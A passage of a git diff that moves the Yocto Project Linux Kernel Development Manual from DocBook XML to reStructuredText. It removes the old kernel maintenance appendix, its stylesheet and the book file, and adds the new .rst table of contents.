+fragments are migrated, pre-processed and passed to the Linux Kernel
+Configuration subsystem (``lkc``) as raw input in the form of a
+``.config`` file. The ``lkc`` uses its own internal dependency
+constraints to do the final processing of that information and generates
+the final ``.config`` file that is used during compilation.
+
+Using the board's architecture and other relevant values from the
+board's template, kernel compilation is started and a kernel image is
+produced.
+
+The other thing that you notice once you configure a kernel is that the
+build process generates a build tree that is separate from your kernel's
+local Git source repository tree. This build tree has a name that uses
+the following form, where ``${MACHINE}`` is the metadata name of the
+machine (BSP) and "kernel_type" is one of the Yocto Project supported
+kernel types (e.g. "standard"):
+::
+
+ linux-${MACHINE}-kernel_type-build
+
+The existing support in the ``kernel.org`` tree achieves this default
+functionality.
+
+This behavior means that all the generated files for a particular
+machine or BSP are now in the build tree directory. The files include
+the final ``.config`` file, all the ``.o`` files, the ``.a`` files, and
+so forth. Since each machine or BSP has its own separate
+:term:`Build Directory` in its own separate
+branch of the Git repository, you can easily switch between different
+builds.
diff --git a/documentation/kernel-dev/kernel-dev-maint-appx.xml b/documentation/kernel-dev/kernel-dev-maint-appx.xml
deleted file mode 100644
index b825ae7ea5..0000000000
--- a/documentation/kernel-dev/kernel-dev-maint-appx.xml
+++ /dev/null
@@ -1,356 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<appendix id='kernel-dev-maint-appx'>
-<title>Kernel Maintenance</title>
-
- <section id='tree-construction'>
- <title>Tree Construction</title>
-
- <para>
- This section describes construction of the Yocto Project kernel
- source repositories as accomplished by the Yocto Project team to
- create Yocto Linux kernel repositories.
- These kernel repositories are found under the heading "Yocto Linux
- Kernel" at
- <ulink url='&YOCTO_GIT_URL;'>&YOCTO_GIT_URL;</ulink>
- and are shipped as part of a Yocto Project release.
- The team creates these repositories by compiling and executing the
- set of feature descriptions for every BSP and feature in the
- product.
- Those feature descriptions list all necessary patches,
- configurations, branches, tags, and feature divisions found in a
- Yocto Linux kernel.
- Thus, the Yocto Project Linux kernel repository (or tree) and
- accompanying Metadata in the
- <filename>yocto-kernel-cache</filename> are built.
- </para>
-
- <para>
- The existence of these repositories allow you to access and clone a
- particular Yocto Project Linux kernel repository and use it to
- build images based on their configurations and features.
- </para>
-
- <para>
- You can find the files used to describe all the valid features and
- BSPs in the Yocto Project Linux kernel in any clone of the Yocto
- Project Linux kernel source repository and
- <filename>yocto-kernel-cache</filename> Git trees.
- For example, the following commands clone the Yocto Project
- baseline Linux kernel that branches off
- <filename>linux.org</filename> version 4.12 and the
- <filename>yocto-kernel-cache</filename>, which contains stores of
- kernel Metadata:
- <literallayout class='monospaced'>
- $ git clone git://git.yoctoproject.org/linux-yocto-4.12
- $ git clone git://git.yoctoproject.org/linux-kernel-cache
- </literallayout>
- For more information on how to set up a local Git repository of
- the Yocto Project Linux kernel files, see the
- "<link linkend='preparing-the-build-host-to-work-on-the-kernel'>Preparing the Build Host to Work on the Kernel</link>"
- section.
- </para>
-
- <para>
- Once you have cloned the kernel Git repository and the
- cache of Metadata on your local machine, you can discover the
- branches that are available in the repository using the following
- Git command:
- <literallayout class='monospaced'>
- $ git branch -a
- </literallayout>
- Checking out a branch allows you to work with a particular
- Yocto Linux kernel.
- For example, the following commands check out the
- "standard/beagleboard" branch of the Yocto Linux kernel repository
- and the "yocto-4.12" branch of the
- <filename>yocto-kernel-cache</filename> repository:
- <literallayout class='monospaced'>
- $ cd ~/linux-yocto-4.12
- $ git checkout -b my-kernel-4.12 remotes/origin/standard/beagleboard
- $ cd ~/linux-kernel-cache
- $ git checkout -b my-4.12-metadata remotes/origin/yocto-4.12
- </literallayout>
- <note>
- Branches in the <filename>yocto-kernel-cache</filename>
- repository correspond to Yocto Linux kernel versions
- (e.g. "yocto-4.12", "yocto-4.10", "yocto-4.9", and so forth).
- </note>
- Once you have checked out and switched to appropriate branches,
- you can see a snapshot of all the kernel source files used to
- used to build that particular Yocto Linux kernel for a
- particular board.
- </para>
-
- <para>
- To see the features and configurations for a particular Yocto
- Linux kernel, you need to examine the
- <filename>yocto-kernel-cache</filename> Git repository.
- As mentioned, branches in the
- <filename>yocto-kernel-cache</filename> repository correspond to
- Yocto Linux kernel versions (e.g. <filename>yocto-4.12</filename>).
- Branches contain descriptions in the form of
- <filename>.scc</filename> and <filename>.cfg</filename> files.
- </para>
-
- <para>
- You should realize, however, that browsing your local
- <filename>yocto-kernel-cache</filename> repository for feature
- descriptions and patches is not an effective way to determine what
- is in a particular kernel branch.
- Instead, you should use Git directly to discover the changes in
- a branch.
- Using Git is an efficient and flexible way to inspect changes to
- the kernel.
- <note>
- Ground up reconstruction of the complete kernel tree is an
- action only taken by the Yocto Project team during an active
- development cycle.
- When you create a clone of the kernel Git repository, you are
- simply making it efficiently available for building and
- development.
- </note>
- </para>
-
- <para>
- The following steps describe what happens when the Yocto Project
- Team constructs the Yocto Project kernel source Git repository
- (or tree) found at
- <ulink url='&YOCTO_GIT_URL;'></ulink> given the
- introduction of a new top-level kernel feature or BSP.
- The following actions effectively provide the Metadata
- and create the tree that includes the new feature, patch, or BSP:
- <orderedlist>
- <listitem><para>
- <emphasis>Pass Feature to the OpenEmbedded Build System:</emphasis>
- A top-level kernel feature is passed to the kernel build
- subsystem.
- Normally, this feature is a BSP for a particular kernel
- type.
- </para></listitem>
- <listitem><para>
- <emphasis>Locate Feature:</emphasis>
- The file that describes the top-level feature is located
- by searching these system directories:
- <itemizedlist>
- <listitem><para>
- The in-tree kernel-cache directories, which are
- located in the
- <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/yocto-kernel-cache/tree/bsp'><filename>yocto-kernel-cache</filename></ulink>
- repository organized under the "Yocto Linux Kernel"
- heading in the
- <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi'>Yocto Project Source Repositories</ulink>.
- </para></listitem>
- <listitem><para>
- Areas pointed to by <filename>SRC_URI</filename>
- statements found in kernel recipes
- </para></listitem>
- </itemizedlist>
- For a typical build, the target of the search is a
- feature description in an <filename>.scc</filename> file
- whose name follows this format (e.g.
- <filename>beaglebone-standard.scc</filename> and
- <filename>beaglebone-preempt-rt.scc</filename>):
- <literallayout class='monospaced'>
- <replaceable>bsp_root_name</replaceable>-<replaceable>kernel_type</replaceable>.scc
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Expand Feature:</emphasis>
- Once located, the feature description is either expanded
- into a simple script of actions, or into an existing
- equivalent script that is already part of the shipped
- kernel.
- </para></listitem>
- <listitem><para>
- <emphasis>Append Extra Features:</emphasis>
- Extra features are appended to the top-level feature
- description.
- These features can come from the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-KERNEL_FEATURES'><filename>KERNEL_FEATURES</filename></ulink>
- variable in recipes.
- </para></listitem>
- <listitem><para>
- <emphasis>Locate, Expand, and Append Each Feature:</emphasis>
- Each extra feature is located, expanded and appended to
- the script as described in step three.
- </para></listitem>
- <listitem><para>
- <emphasis>Execute the Script:</emphasis>
- The script is executed to produce files
- <filename>.scc</filename> and <filename>.cfg</filename>
- files in appropriate directories of the
- <filename>yocto-kernel-cache</filename> repository.
- These files are descriptions of all the branches, tags,
- patches and configurations that need to be applied to the
- base Git repository to completely create the
- source (build) branch for the new BSP or feature.
- </para></listitem>
- <listitem><para>
- <emphasis>Clone Base Repository:</emphasis>
- The base repository is cloned, and the actions
- listed in the <filename>yocto-kernel-cache</filename>
- directories are applied to the tree.
- </para></listitem>
- <listitem><para>
- <emphasis>Perform Cleanup:</emphasis>
- The Git repositories are left with the desired branches
- checked out and any required branching, patching and
- tagging has been performed.
- </para></listitem>
- </orderedlist>
- </para>
-
- <para>
- The kernel tree and cache are ready for developer consumption to
- be locally cloned, configured, and built into a Yocto Project
- kernel specific to some target hardware.
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- The generated <filename>yocto-kernel-cache</filename>
- repository adds to the kernel as shipped with the Yocto
- Project release.
- Any add-ons and configuration data are applied to the
- end of an existing branch.
- The full repository generation that is found in the
- official Yocto Project kernel repositories at
- <ulink url='&YOCTO_GIT_URL;'>http://git.yoctoproject.org</ulink>
- is the combination of all supported boards and
- configurations.
- </para></listitem>
- <listitem><para>
- The technique the Yocto Project team uses is flexible
- and allows for seamless blending of an immutable
- history with additional patches specific to a
- deployment.
- Any additions to the kernel become an integrated part
- of the branches.
- </para></listitem>
- <listitem><para>
- The full kernel tree that you see on
- <ulink url='&YOCTO_GIT_URL;'></ulink> is
- generated through repeating the above steps for all
- valid BSPs.
- The end result is a branched, clean history tree that
- makes up the kernel for a given release.
- You can see the script (<filename>kgit-scc</filename>)
- responsible for this in the
- <ulink url='&YOCTO_GIT_URL;/cgit.cgi/yocto-kernel-tools/tree/tools'><filename>yocto-kernel-tools</filename></ulink>
- repository.
- </para></listitem>
- <listitem><para>
- The steps used to construct the full kernel tree are
- the same steps that BitBake uses when it builds a
- kernel image.
- </para></listitem>
- </itemizedlist>
- </note>
- </para>
- </section>
-
- <section id='build-strategy'>
- <title>Build Strategy</title>
-
- <para>
- Once you have cloned a Yocto Linux kernel repository and the
- cache repository (<filename>yocto-kernel-cache</filename>) onto
- your development system, you can consider the compilation phase
- of kernel development, which is building a kernel image.
- Some prerequisites exist that are validated by the build process
- before compilation starts:
- </para>
-
- <itemizedlist>
- <listitem><para>
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- points to the kernel Git repository.
- </para></listitem>
- <listitem><para>
- A BSP build branch with Metadata exists in the
- <filename>yocto-kernel-cache</filename> repository.
- The branch is based on the Yocto Linux kernel version and
- has configurations and features grouped under the
- <filename>yocto-kernel-cache/bsp</filename> directory.
- For example, features and configurations for the
- BeagleBone Board assuming a
- <filename>linux-yocto_4.12</filename> kernel reside in the
- following area of the <filename>yocto-kernel-cache</filename>
- repository:
- <literallayout class='monospaced'>
- yocto-kernel-cache/bsp/beaglebone
- </literallayout>
- <note>
- In the previous example, the "yocto-4.12" branch is
- checked out in the <filename>yocto-kernel-cache</filename>
- repository.
- </note>
- </para></listitem>
- </itemizedlist>
-
- <para>
- The OpenEmbedded build system makes sure these conditions exist
- before attempting compilation.
- Other means, however, do exist, such as as bootstrapping a BSP.
- </para>
-
- <para>
- Before building a kernel, the build process verifies the tree
- and configures the kernel by processing all of the
- configuration "fragments" specified by feature descriptions
- in the <filename>.scc</filename> files.
- As the features are compiled, associated kernel configuration
- fragments are noted and recorded in the series of directories
- in their compilation order.
- The fragments are migrated, pre-processed and passed to the
- Linux Kernel Configuration subsystem (<filename>lkc</filename>) as
- raw input in the form of a <filename>.config</filename> file.
- The <filename>lkc</filename> uses its own internal dependency
- constraints to do the final processing of that information and
- generates the final <filename>.config</filename> file that is used
- during compilation.
- </para>
-
- <para>
- Using the board's architecture and other relevant values from
- the board's template, kernel compilation is started and a kernel
- image is produced.
- </para>
-
- <para>
- The other thing that you notice once you configure a kernel is that
- the build process generates a build tree that is separate from
- your kernel's local Git source repository tree.
- This build tree has a name that uses the following form, where
- <filename>${MACHINE}</filename> is the metadata name of the
- machine (BSP) and "kernel_type" is one of the Yocto Project
- supported kernel types (e.g. "standard"):
- <literallayout class='monospaced'>
- linux-${MACHINE}-<replaceable>kernel_type</replaceable>-build
- </literallayout>
- </para>
-
- <para>
- The existing support in the <filename>kernel.org</filename> tree
- achieves this default functionality.
- </para>
-
- <para>
- This behavior means that all the generated files for a particular
- machine or BSP are now in the build tree directory.
- The files include the final <filename>.config</filename> file,
- all the <filename>.o</filename> files, the <filename>.a</filename>
- files, and so forth.
- Since each machine or BSP has its own separate
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
- in its own separate branch of the Git repository, you can easily
- switch between different builds.
- </para>
- </section>
-</appendix>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/kernel-dev/kernel-dev-style.css b/documentation/kernel-dev/kernel-dev-style.css
deleted file mode 100644
index 9c01aa7983..0000000000
--- a/documentation/kernel-dev/kernel-dev-style.css
+++ /dev/null
@@ -1,988 +0,0 @@
-/*
- Generic XHTML / DocBook XHTML CSS Stylesheet.
-
- Browser wrangling and typographic design by
- Oyvind Kolas / pippin@gimp.org
-
- Customised for Poky by
- Matthew Allum / mallum@o-hand.com
-
- Thanks to:
- Liam R. E. Quin
- William Skaggs
- Jakub Steiner
-
- Structure
- ---------
-
- The stylesheet is divided into the following sections:
-
- Positioning
- Margins, paddings, width, font-size, clearing.
- Decorations
- Borders, style
- Colors
- Colors
- Graphics
- Graphical backgrounds
- Nasty IE tweaks
- Workarounds needed to make it work in internet explorer,
- currently makes the stylesheet non validating, but up until
- this point it is validating.
- Mozilla extensions
- Transparency for footer
- Rounded corners on boxes
-
-*/
-
-
- /*************** /
- / Positioning /
-/ ***************/
-
-body {
- font-family: Verdana, Sans, sans-serif;
-
- min-width: 640px;
- width: 80%;
- margin: 0em auto;
- padding: 2em 5em 5em 5em;
- color: #333;
-}
-
-h1,h2,h3,h4,h5,h6,h7 {
- font-family: Arial, Sans;
- color: #00557D;
- clear: both;
-}
-
-h1 {
- font-size: 2em;
- text-align: left;
- padding: 0em 0em 0em 0em;
- margin: 2em 0em 0em 0em;
-}
-
-h2.subtitle {
- margin: 0.10em 0em 3.0em 0em;
- padding: 0em 0em 0em 0em;
- font-size: 1.8em;
- padding-left: 20%;
- font-weight: normal;
- font-style: italic;
-}
-
-h2 {
- margin: 2em 0em 0.66em 0em;
- padding: 0.5em 0em 0em 0em;
- font-size: 1.5em;
- font-weight: bold;
-}
-
-h3.subtitle {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
- font-size: 142.14%;
- text-align: right;
-}
-
-h3 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 140%;
- font-weight: bold;
-}
-
-h4 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 120%;
- font-weight: bold;
-}
-
-h5 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 110%;
- font-weight: bold;
-}
-
-h6 {
- margin: 1em 0em 0em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 110%;
- font-weight: bold;
-}
-
-.authorgroup {
- background-color: transparent;
- background-repeat: no-repeat;
- padding-top: 256px;
- background-image: url("figures/kernel-dev-title.png");
- background-position: left top;
- margin-top: -256px;
- padding-right: 50px;
- margin-left: 0px;
- text-align: right;
- width: 740px;
-}
-
-h3.author {
- margin: 0em 0me 0em 0em;
- padding: 0em 0em 0em 0em;
- font-weight: normal;
- font-size: 100%;
- color: #333;
- clear: both;
-}
-
-.author tt.email {
- font-size: 66%;
-}
-
-.titlepage hr {
- width: 0em;
- clear: both;
-}
-
-.revhistory {
- padding-top: 2em;
- clear: both;
-}
-
-.toc,
-.list-of-tables,
-.list-of-examples,
-.list-of-figures {
- padding: 1.33em 0em 2.5em 0em;
- color: #00557D;
-}
-
-.toc p,
-.list-of-tables p,
-.list-of-figures p,
-.list-of-examples p {
- padding: 0em 0em 0em 0em;
- padding: 0em 0em 0.3em;
- margin: 1.5em 0em 0em 0em;
-}
-
-.toc p b,
-.list-of-tables p b,
-.list-of-figures p b,
-.list-of-examples p b{
- font-size: 100.0%;
- font-weight: bold;
-}
-
-.toc dl,
-.list-of-tables dl,
-.list-of-figures dl,
-.list-of-examples dl {
- margin: 0em 0em 0.5em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.toc dt {
- margin: 0em 0em 0em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.toc dd {
- margin: 0em 0em 0em 2.6em;
- padding: 0em 0em 0em 0em;
-}
-
-div.glossary dl,
-div.variablelist dl {
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
- font-weight: normal;
- width: 20em;
- text-align: right;
-}
-
-.variablelist dl dt {
- margin-top: 0.5em;
-}
-
-.glossary dl dd,
-.variablelist dl dd {
- margin-top: -1em;
- margin-left: 25.5em;
-}
-
-.glossary dd p,
-.variablelist dd p {
- margin-top: 0em;
- margin-bottom: 1em;
-}
-
-
-div.calloutlist table td {
- padding: 0em 0em 0em 0em;
- margin: 0em 0em 0em 0em;
-}
-
-div.calloutlist table td p {
- margin-top: 0em;
- margin-bottom: 1em;
-}
-
-div p.copyright {
- text-align: left;
-}
-
-div.legalnotice p.legalnotice-title {
- margin-bottom: 0em;
-}
-
-p {
- line-height: 1.5em;
- margin-top: 0em;
-
-}
-
-dl {
- padding-top: 0em;
-}
-
-hr {
- border: solid 1px;
-}
-
-
-.mediaobject,
-.mediaobjectco {
- text-align: center;
-}
-
-img {
- border: none;
-}
-
-ul {
- padding: 0em 0em 0em 1.5em;
-}
-
-ul li {
- padding: 0em 0em 0em 0em;
-}
-
-ul li p {
- text-align: left;
-}
-
-table {
- width :100%;
-}
-
-th {
- padding: 0.25em;
- text-align: left;
- font-weight: normal;
- vertical-align: top;
-}
-
-td {
- padding: 0.25em;
- vertical-align: top;
-}
-
-p a[id] {
- margin: 0px;
- padding: 0px;
- display: inline;
- background-image: none;
-}
-
-a {
- text-decoration: underline;
- color: #444;
-}
-
-pre {
- overflow: auto;
-}
-
-a:hover {
- text-decoration: underline;
- /*font-weight: bold;*/
-}
-
-/* This style defines how the permalink character
- appears by itself and when hovered over with
- the mouse. */
-
-[alt='Permalink'] { color: #eee; }
-[alt='Permalink']:hover { color: black; }
-
-
-div.informalfigure,
-div.informalexample,
-div.informaltable,
-div.figure,
-div.table,
-div.example {
- margin: 1em 0em;
- padding: 1em;
- page-break-inside: avoid;
-}
-
-
-div.informalfigure p.title b,
-div.informalexample p.title b,
-div.informaltable p.title b,
-div.figure p.title b,
-div.example p.title b,
-div.table p.title b{
- padding-top: 0em;
- margin-top: 0em;
- font-size: 100%;
- font-weight: normal;
-}
-
-.mediaobject .caption,
-.mediaobject .caption p {
- text-align: center;
- font-size: 80%;
- padding-top: 0.5em;
- padding-bottom: 0.5em;
-}
-
-.epigraph {
- padding-left: 55%;
- margin-bottom: 1em;
-}
-
-.epigraph p {
- text-align: left;
-}
-
-.epigraph .quote {
- font-style: italic;
-}
-.epigraph .attribution {
- font-style: normal;
- text-align: right;
-}
-
-span.application {
- font-style: italic;
-}
-
-.programlisting {
- font-family: monospace;
- font-size: 80%;
- white-space: pre;
- margin: 1.33em 0em;
- padding: 1.33em;
-}
-
-.tip,
-.warning,
-.caution,
-.note {
- margin-top: 1em;
- margin-bottom: 1em;
-
-}
-
-/* force full width of table within div */
-.tip table,
-.warning table,
-.caution table,
-.note table {
- border: none;
- width: 100%;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- padding: 0.8em 0.0em 0.0em 0.0em;
- margin : 0em 0em 0em 0em;
-}
-
-.tip p,
-.warning p,
-.caution p,
-.note p {
- margin-top: 0.5em;
- margin-bottom: 0.5em;
- padding-right: 1em;
- text-align: left;
-}
-
-.acronym {
- text-transform: uppercase;
-}
-
-b.keycap,
-.keycap {
- padding: 0.09em 0.3em;
- margin: 0em;
-}
-
-.itemizedlist li {
- clear: none;
-}
-
-.filename {
- font-size: medium;
- font-family: Courier, monospace;
-}
-
-
-div.navheader, div.heading{
- position: absolute;
- left: 0em;
- top: 0em;
- width: 100%;
- background-color: #cdf;
- width: 100%;
-}
-
-div.navfooter, div.footing{
- position: fixed;
- left: 0em;
- bottom: 0em;
- background-color: #eee;
- width: 100%;
-}
-
-
-div.navheader td,
-div.navfooter td {
- font-size: 66%;
-}
-
-div.navheader table th {
- /*font-family: Georgia, Times, serif;*/
- /*font-size: x-large;*/
- font-size: 80%;
-}
-
-div.navheader table {
- border-left: 0em;
- border-right: 0em;
- border-top: 0em;
- width: 100%;
-}
-
-div.navfooter table {
- border-left: 0em;
- border-right: 0em;
- border-bottom: 0em;
- width: 100%;
-}
-
-div.navheader table td a,
-div.navfooter table td a {
- color: #777;
- text-decoration: none;
-}
-
-/* normal text in the footer */
-div.navfooter table td {
- color: black;
-}
-
-div.navheader table td a:visited,
-div.navfooter table td a:visited {
- color: #444;
-}
-
-
-/* links in header and footer */
-div.navheader table td a:hover,
-div.navfooter table td a:hover {
- text-decoration: underline;
- background-color: transparent;
- color: #33a;
-}
-
-div.navheader hr,
-div.navfooter hr {
- display: none;
-}
-
-
-.qandaset tr.question td p {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.qandaset tr.answer td p {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
-}
-.answer td {
- padding-bottom: 1.5em;
-}
-
-.emphasis {
- font-weight: bold;
-}
-
-
- /************* /
- / decorations /
-/ *************/
-
-.titlepage {
-}
-
-.part .title {
-}
-
-.subtitle {
- border: none;
-}
-
-/*
-h1 {
- border: none;
-}
-
-h2 {
- border-top: solid 0.2em;
- border-bottom: solid 0.06em;
-}
-
-h3 {
- border-top: 0em;
- border-bottom: solid 0.06em;
-}
-
-h4 {
- border: 0em;
- border-bottom: solid 0.06em;
-}
-
-h5 {
- border: 0em;
-}
-*/
-
-.programlisting {
- border: solid 1px;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example {
- border: 1px solid;
-}
-
-
-
-.tip,
-.warning,
-.caution,
-.note {
- border: 1px solid;
-}
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- border-bottom: 1px solid;
-}
-
-.question td {
- border-top: 1px solid black;
-}
-
-.answer {
-}
-
-
-b.keycap,
-.keycap {
- border: 1px solid;
-}
-
-
-div.navheader, div.heading{
- border-bottom: 1px solid;
-}
-
-
-div.navfooter, div.footing{
- border-top: 1px solid;
-}
-
- /********* /
- / colors /
-/ *********/
-
-body {
- color: #333;
- background: white;
-}
-
-a {
- background: transparent;
-}
-
-a:hover {
- background-color: #dedede;
-}
-
-
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7,
-h8 {
- background-color: transparent;
-}
-
-hr {
- border-color: #aaa;
-}
-
-
-.tip, .warning, .caution, .note {
- border-color: #fff;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- border-bottom-color: #fff;
-}
-
-
-.warning {
- background-color: #f0f0f2;
-}
-
-.caution {
- background-color: #f0f0f2;
-}
-
-.tip {
- background-color: #f0f0f2;
-}
-
-.note {
- background-color: #f0f0f2;
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
- color: #044;
-}
-
-div.figure,
-div.table,
-div.example,
-div.informalfigure,
-div.informaltable,
-div.informalexample {
- border-color: #aaa;
-}
-
-pre.programlisting {
- color: black;
- background-color: #fff;
- border-color: #aaa;
- border-width: 2px;
-}
-
-.guimenu,
-.guilabel,
-.guimenuitem {
- background-color: #eee;
-}
-
-
-b.keycap,
-.keycap {
- background-color: #eee;
- border-color: #999;
-}
-
-
-div.navheader {
- border-color: black;
-}
-
-
-div.navfooter {
- border-color: black;
-}
-
-.writernotes {
- color: red;
-}
-
-
- /*********** /
- / graphics /
-/ ***********/
-
-/*
-body {
- background-image: url("images/body_bg.jpg");
- background-attachment: fixed;
-}
-
-.navheader,
-.note,
-.tip {
- background-image: url("images/note_bg.jpg");
- background-attachment: fixed;
-}
-
-.warning,
-.caution {
- background-image: url("images/warning_bg.jpg");
- background-attachment: fixed;
-}
-
-.figure,
-.informalfigure,
-.example,
-.informalexample,
-.table,
-.informaltable {
- background-image: url("images/figure_bg.jpg");
- background-attachment: fixed;
-}
-
-*/
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7{
-}
-
-/*
-Example of how to stick an image as part of the title.
-
-div.article .titlepage .title
-{
- background-image: url("figures/white-on-black.png");
- background-position: center;
- background-repeat: repeat-x;
-}
-*/
-
-div.preface .titlepage .title,
-div.colophon .title,
-div.chapter .titlepage .title,
-div.article .titlepage .title
-{
-}
-
-div.section div.section .titlepage .title,
-div.sect2 .titlepage .title {
- background: none;
-}
-
-
-h1.title {
- background-color: transparent;
- background-repeat: no-repeat;
- height: 256px;
- text-indent: -9000px;
- overflow:hidden;
-}
-
-h2.subtitle {
- background-color: transparent;
- text-indent: -9000px;
- overflow:hidden;
- width: 0px;
- display: none;
-}
-
- /*************************************** /
- / pippin.gimp.org specific alterations /
-/ ***************************************/
-
-/*
-div.heading, div.navheader {
- color: #777;
- font-size: 80%;
- padding: 0;
- margin: 0;
- text-align: left;
- position: absolute;
- top: 0px;
- left: 0px;
- width: 100%;
- height: 50px;
- background: url('/gfx/heading_bg.png') transparent;
- background-repeat: repeat-x;
- background-attachment: fixed;
- border: none;
-}
-
-div.heading a {
- color: #444;
-}
-
-div.footing, div.navfooter {
- border: none;
- color: #ddd;
- font-size: 80%;
- text-align:right;
-
- width: 100%;
- padding-top: 10px;
- position: absolute;
- bottom: 0px;
- left: 0px;
-
- background: url('/gfx/footing_bg.png') transparent;
-}
-*/
-
-
-
- /****************** /
- / nasty ie tweaks /
-/ ******************/
-
-/*
-div.heading, div.navheader {
- width:expression(document.body.clientWidth + "px");
-}
-
-div.footing, div.navfooter {
- width:expression(document.body.clientWidth + "px");
- margin-left:expression("-5em");
-}
-body {
- padding:expression("4em 5em 0em 5em");
-}
-*/
-
- /**************************************** /
- / mozilla vendor specific css extensions /
-/ ****************************************/
-/*
-div.navfooter, div.footing{
- -moz-opacity: 0.8em;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example,
-.tip,
-.warning,
-.caution,
-.note {
- -moz-border-radius: 0.5em;
-}
-
-b.keycap,
-.keycap {
- -moz-border-radius: 0.3em;
-}
-*/
-
-table tr td table tr td {
- display: none;
-}
-
-
-hr {
- display: none;
-}
-
-table {
- border: 0em;
-}
-
- .photo {
- float: right;
- margin-left: 1.5em;
- margin-bottom: 1.5em;
- margin-top: 0em;
- max-width: 17em;
- border: 1px solid gray;
- padding: 3px;
- background: white;
-}
- .seperator {
- padding-top: 2em;
- clear: both;
- }
-
- #validators {
- margin-top: 5em;
- text-align: right;
- color: #777;
- }
- @media print {
- body {
- font-size: 8pt;
- }
- .noprint {
- display: none;
- }
- }
-
-
-.tip,
-.note {
- background: #f0f0f2;
- color: #333;
- padding: 20px;
- margin: 20px;
-}
-
-.tip h3,
-.note h3 {
- padding: 0em;
- margin: 0em;
- font-size: 2em;
- font-weight: bold;
- color: #333;
-}
-
-.tip a,
-.note a {
- color: #333;
- text-decoration: underline;
-}
-
-.footnote {
- font-size: small;
- color: #333;
-}
-
-/* Changes the announcement text */
-.tip h3,
-.warning h3,
-.caution h3,
-.note h3 {
- font-size:large;
- color: #00557D;
-}
diff --git a/documentation/kernel-dev/kernel-dev.rst b/documentation/kernel-dev/kernel-dev.rst
new file mode 100644
index 0000000000..55b42ed992
--- /dev/null
+++ b/documentation/kernel-dev/kernel-dev.rst
@@ -0,0 +1,21 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+=============================================
+Yocto Project Linux Kernel Development Manual
+=============================================
+
+|
+
+.. toctree::
+ :caption: Table of Contents
+ :numbered:
+
+ kernel-dev-intro
+ kernel-dev-common
+ kernel-dev-advanced
+ kernel-dev-concepts-appx
+ kernel-dev-maint-appx
+ kernel-dev-faq
+ history
+
+.. include:: /boilerplate.rst
diff --git a/documentation/kernel-dev/kernel-dev.xml b/documentation/kernel-dev/kernel-dev.xml
deleted file mode 100755
index 76256c9c3e..0000000000
--- a/documentation/kernel-dev/kernel-dev.xml
+++ /dev/null
@@ -1,206 +0,0 @@
-<!DOCTYPE book PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<book id='kernel-dev' lang='en'
- xmlns:xi="http://www.w3.org/2003/XInclude"
- xmlns="http://docbook.org/ns/docbook"
- >
- <bookinfo>
-
- <mediaobject>
- <imageobject>
- <imagedata fileref='figures/kernel-dev-title.png'
- format='SVG'
- align='left' scalefit='1' width='100%'/>
- </imageobject>
- </mediaobject>
-
- <title>
- Yocto Project Linux Kernel Development Manual
- </title>
-
- <authorgroup>
- <author>
- <affiliation>
- <orgname>&ORGNAME;</orgname>
- </affiliation>
- <email>&ORGEMAIL;</email>
- </author>
- </authorgroup>
-
- <revhistory>
- <revision>
- <revnumber>1.4</revnumber>
- <date>April 2013</date>
- <revremark>The initial document released with the Yocto Project 1.4 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.5</revnumber>
- <date>October 2013</date>
- <revremark>Released with the Yocto Project 1.5 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.6</revnumber>
- <date>April 2014</date>
- <revremark>Released with the Yocto Project 1.6 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.7</revnumber>
- <date>October 2014</date>
- <revremark>Released with the Yocto Project 1.7 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.8</revnumber>
- <date>April 2015</date>
- <revremark>Released with the Yocto Project 1.8 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.0</revnumber>
- <date>October 2015</date>
- <revremark>Released with the Yocto Project 2.0 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.1</revnumber>
- <date>April 2016</date>
- <revremark>Released with the Yocto Project 2.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.2</revnumber>
- <date>October 2016</date>
- <revremark>Released with the Yocto Project 2.2 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.3</revnumber>
- <date>May 2017</date>
